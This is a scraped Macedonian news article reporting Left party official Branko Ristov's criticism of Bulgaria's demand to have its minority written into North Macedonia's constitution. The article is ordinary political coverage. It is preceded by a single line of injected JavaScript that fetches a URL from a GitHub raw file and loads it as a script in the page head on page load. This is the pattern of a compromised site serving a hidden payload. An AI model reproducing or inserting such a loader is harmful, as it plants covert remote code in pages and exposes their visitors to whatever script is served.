;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Ристов: Земја која не признава малцинства бара нивното малцинство да биде конститутивно во друга држава - Антропол
АктуелноЛокално

Ристов: Земја која не признава малцинства бара нивното малцинство да биде конститутивно во друга држава

Околу многу прашања кои беа полемика за јавноста во однос на тоа што преговара македонската дипломатија предводена од Османи со Бугарија и претставниците на ЕУ, полека се „размоткува клопчето“. Една од темите кои Власта на почетокот ги криеше, а подоцна по соопштувањето од бугарска страна почна да ги релативизира, беше внесувањето на бугарското малцинство во Македонскиот Устав како конститутивен народ на македонската држава.

За ова неприфатливо барање, функционерите на владејачките ДУИ и СДСМ тврдеа дека ќе биде „реализирано“ на крајот од преговорите со ЕУ. Но, ова се испостави како уште една од бројните невистини споделени од Владата, а ова барање е ставено како основен услов за тргање на ветото за отпочнување на преговорите со ЕУ.

Членот од Президиумот на Левица Бранко Ристов остро реагираше по однос на ова прашање. Тој смета дека држава која не признава малцинство во сопствената држава, нема право да бара нејзиното малцинство да биде конститутивно во друга земја.

Држава со повеќе пресуди на меѓународен суд, заради непочитување на правата на македонското малцинство, бара внесување во устав на нивното малцинство, не само како малцинство, ами и како државотворен народ. СДС, партијата на власт, носат одлука дека се согласни. Нема да ви помине! – Напиша Ристов на својот фејсбук профил.

Потсетуваме, Европскиот суд за човекови права во Стразбур има донесено 16 пресуди во корист на македонското малцинство во Бугарија, но, досега ниту една не е испочитувана. Дополнително, партијата на Македонците во Бугарија ОМО Илинден Пирин се’ уште е забранета.